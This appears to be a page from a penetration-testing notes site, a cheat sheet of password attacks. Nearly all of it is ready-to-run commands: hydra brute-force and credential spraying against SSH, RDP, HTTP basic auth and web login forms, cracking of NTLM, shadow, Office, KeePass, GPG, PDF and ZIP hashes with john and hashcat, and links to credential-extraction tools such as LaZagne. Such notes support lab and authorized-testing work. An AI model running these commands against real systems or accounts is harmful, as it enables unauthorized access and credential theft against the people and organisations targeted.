Attacks

Identify

Some Lists

/usr/share/wordlists/rockyou.txt
/usr/share/metasploit-framework/data/wordlists/unix_users.txt
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
/usr/share/wordlists/SecLists/Discovery/Web-Content/raft-large-files.txt
/usr/share/wordlists/SecLists/Discovery/Web-Content/raft-large-directories.txt

SSH

hydra -l root -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://IP
hydra -L /usr/share/wordlists/dirb/others/names.txt -P /path/to/wordlist.txt ssh://10.10.x.x -v

# Cred spray
hydra -l user -p pass -M servers.txt ssh

# ssh2john
ssh2john id_rsa > ssh.hash
john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash
chmod 600 id_rsa
ssh -i id_rsa user@host

RDP

# Spray
hydra -L /usr/share/wordlists/dirb/others/names.txt -p "Password123" rdp://IP

HTTP

# Brute Forcing Basic Auth
hydra -l admin -P /usr/share/wordlists/rockyou.txt http-get://IP
Authorization: Basic base64("user:pass")

# Post Login Form
hydra -l user -P /usr/share/wordlists/rockyou.txt IP http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed."

NTLM

hashcat -m 5600 sam.hash /usr/share/wordlists/rockyou.txt
john sam.hash --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt

Unshadow

# Takes both files and combines them into a format compatible for cracking
unshadow passwd shadow > unshadow.hash
john unshadow.hash --wordlist=/usr/share/wordlists/rockyou.txt

Office

office2john secret.docx > office.hash
john office.hash --wordlist=/usr/share/wordlists/rockyou.txt

KeePass

keepass2john Database.kdbx > keepass.hash
hashcat --help | grep -i "KeePass"
hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force

If John Errors:
./keepass4brute.sh /root/recovery.kdbx /usr/share/wordlists/rockyou.txt

PGP Private Key

# Convert GPG key
gpg2john file.asc > gpg.hash

# Crack the password for the GPG key
john --wordlist=/usr/share/wordlists/rockyou.txt gpg.hash

# Once the password is retrieved, import the GPG key to your keyring
gpg --import file.asc

# Decrypt the protected file
gpg --decrypt credential.pgp

PDF

pdf2john
apt-get install pdfcrack
pdfcrack document.pdf -w /usr/share/wordlists/rockyou.txt

ZIP

# ZIP
zip2john files.zip > zip.hash
john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt --format=zip
7z x files.zip

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt files.zip

# WinRAR
rar2john files.zip > zip.hash

RSA

https://www.dcode.fr/rsa-cipher
git clone https://github.com/Ganapati/RsaCtfTool.git

Other

GitHub - unode/firefox_decrypt: Firefox Decrypt is a tool to extract passwords from Mozilla (Firefox™, Waterfox™, Thunderbird®, SeaMonkey®) profilesGitHub

GitHub - AlessandroZ/LaZagne: Credentials recovery projectGitHub

PreviousTTYs NextWindown Enumeration

Last updated 5 months ago